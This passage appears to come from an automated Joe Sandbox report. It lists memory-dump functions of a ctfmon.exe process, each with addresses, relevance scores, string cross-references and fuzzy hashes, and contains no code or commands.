Opcode ID: 1af28936396afa2df753c2ceaa01395029253ff690a087cbaa0142bd0e2dbce4
Instruction ID: bfc40c210b6d41a755e227f6cc832c2637a66d357ab0d67a4f2b93d1cf6e3fa5
Opcode Fuzzy Hash: 1af28936396afa2df753c2ceaa01395029253ff690a087cbaa0142bd0e2dbce4
Instruction Fuzzy Hash: 7AD0173081E55A9EDB90F714C851AE9B770AF25340F1042A2810ED2182CE38AA808B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F48EA7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction ID: 1fcd93db17b1ec71ea38586106e23ca01b0735dee579fe73f3e938c6a10819e6
Opcode Fuzzy Hash: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction Fuzzy Hash: 6CD06770909A198ED764EB048854769B261FB54642F1005F7850DF73D1EE742A808F04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F51001 Relevance: 7.6, Strings: 6, Instructions: 131COMMON

Download Yara Rule

Strings

", xrefs: 00007FF848F51A67
[, xrefs: 00007FF848F512E4
&, xrefs: 00007FF848F51A12
{, xrefs: 00007FF848F51001
/, xrefs: 00007FF848F51870
", xrefs: 00007FF848F5129E

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID: "$"$&$/$[${
API String ID: 0-683516320
Opcode ID: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction ID: cb48e7462d76186caff64f6619aed8c676622097c88ef8017e03eee3f464cfb0
Opcode Fuzzy Hash: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction Fuzzy Hash: 5C51D370D082298FEB68EF55C4947BDBAB1BF54395F2040BAD05EA72C2CB386984DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F5199B Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

", xrefs: 00007FF848F51A67
&, xrefs: 00007FF848F51A12
/, xrefs: 00007FF848F51870
}, xrefs: 00007FF848F519DF

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID: "$&$/$}
API String ID: 0-3572482012
Opcode ID: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction ID: 6fadd8a097a4f54201b47955b5c437b8f9c651826303bea16b429069346e5280
Opcode Fuzzy Hash: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction Fuzzy Hash: 9F310034D082298FDBA8EF54C8907BDB7B1FB54755F1044AAD00AAB2E1DB386A84CF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ctfmon.exePID: 5644, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F5139C Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

., xrefs: 00007FF848F515CA
", xrefs: 00007FF848F51602
/, xrefs: 00007FF848F51870

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID: "$.$/
API String ID: 0-983106565
Opcode ID: d27661d4ddf4a26110aaeafd1b5ce34780b002c3b4bb51bf2f5a59ee203b1719
Instruction ID: 777ff322210f7d610d535fd23d7341f79a02cd0e85fc06992b1c52feff383347
Opcode Fuzzy Hash: d27661d4ddf4a26110aaeafd1b5ce34780b002c3b4bb51bf2f5a59ee203b1719
Instruction Fuzzy Hash: 2A31F330D086198FEB68EF54C8987EDB3B1FF55345F1045AAC41DAA292CB786A84CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4D9C9 Relevance: 2.9, Strings: 2, Instructions: 399COMMON

Download Yara Rule

Strings

NH, xrefs: 00007FF848F4DA74
p\H, xrefs: 00007FF848F4DAE2

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4d000_ctfmon.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: d6647fa70379e67e9a8cdb1b61bf37bb32abef6b1c183c0a0da35aeb7e5d38f3
Instruction ID: 3215b163047851266a8b2fb9c65395d272b6c0070329e4e03906c9f81d5e72c8
Opcode Fuzzy Hash: d6647fa70379e67e9a8cdb1b61bf37bb32abef6b1c183c0a0da35aeb7e5d38f3
Instruction Fuzzy Hash: C9E14B71D19A599FEB98EB68C4957B8B7B1FF68740F0441BAD00DE32D2CB386885CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F40A70

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: a3d6f027a6e765f70734376f26bb89770a465f66fc21fc70197074aec152dde8
Instruction ID: d55db58da782c186b10c00fda4a81a32e289c6f8de98567f95df1e83c6d393c7
Opcode Fuzzy Hash: a3d6f027a6e765f70734376f26bb89770a465f66fc21fc70197074aec152dde8
Instruction Fuzzy Hash: 0B115B31D1854E9EE780FB68C8491B97BE1FFA8780F4045B6D818E6192EF78A5448744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F411FD

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 19c0f3703c940419f7f078a5a89e102f2f056818d98e0b61fde6701bcd3d64d8
Instruction ID: 0f8906c84f54b0f665b2d43f7cafa5738e7939d1f09745441ff8c20e2e2bd6c0
Opcode Fuzzy Hash: 19c0f3703c940419f7f078a5a89e102f2f056818d98e0b61fde6701bcd3d64d8
Instruction Fuzzy Hash: 0311BF71D0CA5A4EEB59EB6488692B97BE0FFA5341F1504BFC40AE60D2EB286580C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F411A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F411FD

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 1b31ba016897ce242aefd6887328d4f24c615e083c424944c633886756598f6b
Instruction ID: eaf0ac8958caa7dd5a940d5518fc474c1f4ed7a310d7c0165deb44609fa475b4
Opcode Fuzzy Hash: 1b31ba016897ce242aefd6887328d4f24c615e083c424944c633886756598f6b
Instruction Fuzzy Hash: E1F0C870D1CA6E4DFB54BB6498193F97AE4FFA5745F00143BD41AD20C1FF3415948644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F532E4 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f945bfe5c92703dc584d1aa2fc27baf4cc0b168ffd5d52cdd8564f7c683b63c
Instruction ID: bcc4405cc5a361ac65f7a324d18d082584401bc7a2909d97e9c091cde4cfe448
Opcode Fuzzy Hash: 3f945bfe5c92703dc584d1aa2fc27baf4cc0b168ffd5d52cdd8564f7c683b63c
Instruction Fuzzy Hash: E3017C7190E6CA8EE752A73C48662B9BFB0AF13240F4804FAD089C70D3EA185948C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F5382F Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f445aaa3c3dcb33029dd1539d44ae65a9a8913f50d3bee05cb97c92815b70d22
Instruction ID: e165cd96a9babd634a6ce621af0b160a81b3ae542a3d54132af0279c4d80e87d
Opcode Fuzzy Hash: f445aaa3c3dcb33029dd1539d44ae65a9a8913f50d3bee05cb97c92815b70d22
Instruction Fuzzy Hash: 0B91F837A1E4659EE704BB7CB8955EABBA0FF853B9F040777D188CD083DA186046C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F416A8 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c30ad51c47b6893da2c4f1c836adfe35b64c3ed3b5ca41ae07ffd004e0d50e
Instruction ID: 99bde78aa04304ed55a1f879e33952cb3d75c1dae3404bbe93229062bf8080a6
Opcode Fuzzy Hash: d0c30ad51c47b6893da2c4f1c836adfe35b64c3ed3b5ca41ae07ffd004e0d50e
Instruction Fuzzy Hash: 6D91BE31A0CA5A8FDB58EF1898556B977E2FFA8B44F14017AD44DD32C2CE34AC42C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F52A87 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b90687a1ca09852c7d79d20d0fe8cd3147eb18e2bc7e1e2e24d2bb2a1e16519
Instruction ID: af023c5ea31cd037fecca4121aeac26eaca5136e50146aa5b0c76e8f0bbaac00
Opcode Fuzzy Hash: 4b90687a1ca09852c7d79d20d0fe8cd3147eb18e2bc7e1e2e24d2bb2a1e16519
Instruction Fuzzy Hash: 6291A470D1851D8EEBA4EB98C855BEDBBB1FF68340F1042BAD41DE3292DF3469858B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F435FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866c850dc633f465e5374da01f04df7449a126c528247bf8e0543ee087c28894
Instruction ID: afc1c0ebade63485992b8e3232461c34f3376818ef3c31e57a96dc6c6187bf1b
Opcode Fuzzy Hash: 866c850dc633f465e5374da01f04df7449a126c528247bf8e0543ee087c28894
Instruction Fuzzy Hash: EC71AC71D1D94A8FE794EB6CD8597A9BFE2FB99350F50027AC00DD32C6DFA818018B05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f12c54d31b2ed9bd3ec3923cc0e77a0c8523064bfbf60e4563804cf8d91e91
Instruction ID: 7e04ed1c89684be885447db59f006f0371867efaac9d63d0f34d0155f1990f33
Opcode Fuzzy Hash: 10f12c54d31b2ed9bd3ec3923cc0e77a0c8523064bfbf60e4563804cf8d91e91
Instruction Fuzzy Hash: 8351C131A0CA9A4FDB48EF1888545BA77E2FFA8B54F14017ED45AD32C2CF35E8428785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F431C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc599063b16e4d48ace930763694c741ae8cecbd7334c793c58bbb71e07a712
Instruction ID: be5b8bcc8f0b7df6ab35a5378606b06c3fdda2b9bfb23889f62eb8038211b936
Opcode Fuzzy Hash: 8fc599063b16e4d48ace930763694c741ae8cecbd7334c793c58bbb71e07a712
Instruction Fuzzy Hash: 00510570D0861D8EEB54EBA8D458AFDBBB1FF68750F10407AD009E72D2DB386944CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42085 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdbffa0f32ab529171265f3a8f6f1a62e91098f2107b374c73381aa93fb7e4d8
Instruction ID: 307c3ed8783e564172cddb06466deee32ad9f7a67d88e4ac5cb587738c3ac1bb
Opcode Fuzzy Hash: bdbffa0f32ab529171265f3a8f6f1a62e91098f2107b374c73381aa93fb7e4d8
Instruction Fuzzy Hash: 90412231E0DA4A4FE345EBB898491B8BBE1EF96790F0544BBD04DD71D3EF28A8418355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F528DC Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823ab07851a0598a56af0c8f823e6ef80e4f1f39641452681ea9cc073e55183c
Instruction ID: eb7df86b45393160ccb6884e32b867f2a572c0d9fdb9029dd4fcbd6c89bdb4ca
Opcode Fuzzy Hash: 823ab07851a0598a56af0c8f823e6ef80e4f1f39641452681ea9cc073e55183c
Instruction Fuzzy Hash: C441B570D186198FEB94EB58C894BACBBB1FF69340F4052AAD40DE3292DF346984DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F5267D Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcc370518bbbb025cb34ad7b79778d7b9204840e5366da9cc6824084436115a8
Instruction ID: fe0b1f207bdff9c6dad9748ca61c949322c522da229f03590106b6cdeceeff83
Opcode Fuzzy Hash: bcc370518bbbb025cb34ad7b79778d7b9204840e5366da9cc6824084436115a8
Instruction Fuzzy Hash: 89416D30D2965D9FEB44EB98D8556EEB7B1FF58301F10017AD409E3292DF786840CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BD69 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c666c0f8a94dd654904225c65fb74b02830a807e248177714a6dc85af3da24
Instruction ID: 02c50eb2aeacd12d4ffdab7b94615f70bc593b54d468fb59fd53dba6a874fa18
Opcode Fuzzy Hash: 67c666c0f8a94dd654904225c65fb74b02830a807e248177714a6dc85af3da24
Instruction Fuzzy Hash: 1D314570D1D6498FEB54EFA4C8946EDBBF1EF69300F14007AD009E7292DB38A940CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4AE88 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d250d1e9ed5c8f16d684f6cbc0802f0172e8dbabd841d91fd933da2053a04df
Instruction ID: 2383cebd94d57c0fc2142177300f1c4c37e1d726bde9796300ac019fe5f34a52
Opcode Fuzzy Hash: 6d250d1e9ed5c8f16d684f6cbc0802f0172e8dbabd841d91fd933da2053a04df
Instruction Fuzzy Hash: E431C172D0D68A8FE701AB7888191F97BE0FF25790F0804BBC459D71D3EF2869948355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F539D3 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d9fa529d38636bcd8eb9350b0b0a214c4aecbaa767d1cff9c3ea91d964a2178
Instruction ID: 96afa04a9823d2ce4c2766166f7477b36fc6a6adbc162cbec2a2bce982a21626
Opcode Fuzzy Hash: 5d9fa529d38636bcd8eb9350b0b0a214c4aecbaa767d1cff9c3ea91d964a2178
Instruction Fuzzy Hash: BF213A36E0E58A9EF711BB2CAC552F9FFA0FF42365F4401BBC548CA083DA285444C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4A561 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 636083d4211f003dab7f2ec1ee1a731d6547cc72c2fa76bd0af173c1b51e48d8
Instruction ID: a4d4b87458659d2339579a274ffd17e7877f9656ad2a9028d368253bc2c3ba64
Opcode Fuzzy Hash: 636083d4211f003dab7f2ec1ee1a731d6547cc72c2fa76bd0af173c1b51e48d8
Instruction Fuzzy Hash: 5A215E7090864D8FDB89EF18C499AED7BF1FF28705F0501AAE81AD7291DB34E480CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F433CF Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817d3ba14326b1fd6d38e4036471c83a2373fd19a2ffd9be9c1a65c77dc6f080
Instruction ID: 382c1169bc744024b04c30840ebd18a0d448f8a9fd3a09f000dd0eef495f86a8
Opcode Fuzzy Hash: 817d3ba14326b1fd6d38e4036471c83a2373fd19a2ffd9be9c1a65c77dc6f080
Instruction Fuzzy Hash: 04216A3084D68A9FE743AB788858AA97FF0EF26340F0905FBD049C70B2EB389455C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2bd953b69afd03a90652d763b2c072f68e5fe054d98aeba4c4032ee9d7fd14
Instruction ID: 6504e29276991f6fdc1b5234a14f2f811dd8200722c6e377639624fa6d1f812a
Opcode Fuzzy Hash: 9b2bd953b69afd03a90652d763b2c072f68e5fe054d98aeba4c4032ee9d7fd14
Instruction Fuzzy Hash: 8611702184E2D14EEB23677818651616FD48F23674F2D46FBD0D8EB0E3D70D588AC316

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F523E1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915309000ee7d45736f45ab65cb4f4c8ed9c3d7e809c4b75a19e2ff6ca6cf4ec
Instruction ID: 8c4f8e80e2b261c783b92798ac89566dc9541759172ceb55926a9d0554030532
Opcode Fuzzy Hash: 915309000ee7d45736f45ab65cb4f4c8ed9c3d7e809c4b75a19e2ff6ca6cf4ec
Instruction Fuzzy Hash: 4B118E7090C6898FDB49EF18C4955E9BBE1FF58345F1502BEE80AC3292DB35A550CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4085D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf28295d8679345fcd47ab53b83c4e41ceeb7fbdd1fdaadd5424908792ddb924
Instruction ID: 9a06960a479f61a1c9c6059ecb5053a100b3d3bdbb322c4a6b6aac10fb393958
Opcode Fuzzy Hash: bf28295d8679345fcd47ab53b83c4e41ceeb7fbdd1fdaadd5424908792ddb924
Instruction Fuzzy Hash: F101003190C68E9EE782FB7889885A87BE0EFA5740F2504B3D808D60D3EA24A4458294

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54675 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec37112e4838e1b23a1d130563507485b5d526ced5d4e68e11f66f03a4902b9a
Instruction ID: 9dc72405109ad4a19bde8f0b1399c95833980e66bb872ad274811f8fc0cd9ca6
Opcode Fuzzy Hash: ec37112e4838e1b23a1d130563507485b5d526ced5d4e68e11f66f03a4902b9a
Instruction Fuzzy Hash: 03117F7090DA5E9FDB89EF6884592B9BBE0FF68341F0405BAD409C35D6DB78A490CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F545D9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04eb6e5ab90d60770bd52f31827683c8c8b1164dda792b3185d9a54da6d2cb12
Instruction ID: d5bdbef8f3fb34a8d685096d0b57090d985ea7b2e3694fc873ed3acc62269630
Opcode Fuzzy Hash: 04eb6e5ab90d60770bd52f31827683c8c8b1164dda792b3185d9a54da6d2cb12
Instruction Fuzzy Hash: DC218C7080DA8E9FDB89EF2884592BDBBA0FF69341F0405BBD419C71D2DB79A484CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F525EB Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564d3407908ed7dc498d639c315750ffe6f85afce65469fd39aecc42e7d33525
Instruction ID: 8cde44f9932597fb4a80430f022b6ef5948ced1fdc938166ff6bf023f27e5b8d
Opcode Fuzzy Hash: 564d3407908ed7dc498d639c315750ffe6f85afce65469fd39aecc42e7d33525
Instruction Fuzzy Hash: 4311DD3084D7894FDB5AAB6088692E9BFA0FF16302F4501BAD40AC60E3EB386542C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54B15 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96a76b37767aa9b1d6581c718911598645adff850579c8ef40d4e980d4fb57c
Instruction ID: 8e94bba7c8fbcf467d2db077ab553eb1c2be26dd23c556a213eca370aaa29d40
Opcode Fuzzy Hash: f96a76b37767aa9b1d6581c718911598645adff850579c8ef40d4e980d4fb57c
Instruction Fuzzy Hash: 5411C171C0DA899FEB99EB6498AA2B8BBA0FF69305F0504FEC00DC75D3DB296444C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BE4D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction ID: 411364d39685277e854cd0eab77556a51f900ad3f222150b83ce1c86e491f311
Opcode Fuzzy Hash: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction Fuzzy Hash: F021D570D1920A8FEB58EF94D8906EDBBB1BF68750F10003EE419B32D1CB386980CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4359B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2531c2d83a4b7e174d17a18abd89d616a87c34c852da51a60f263be11f77e871
Instruction ID: 36f05732870444f6a767fd4826c6d250bcda658b16ee6740f071c4f089c58591
Opcode Fuzzy Hash: 2531c2d83a4b7e174d17a18abd89d616a87c34c852da51a60f263be11f77e871
Instruction Fuzzy Hash: 6411917090D98B8EEB59AB28C519AB977A0FF29745F0408BEC00EE30D2DF3964018B18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F57441 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2204929663.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
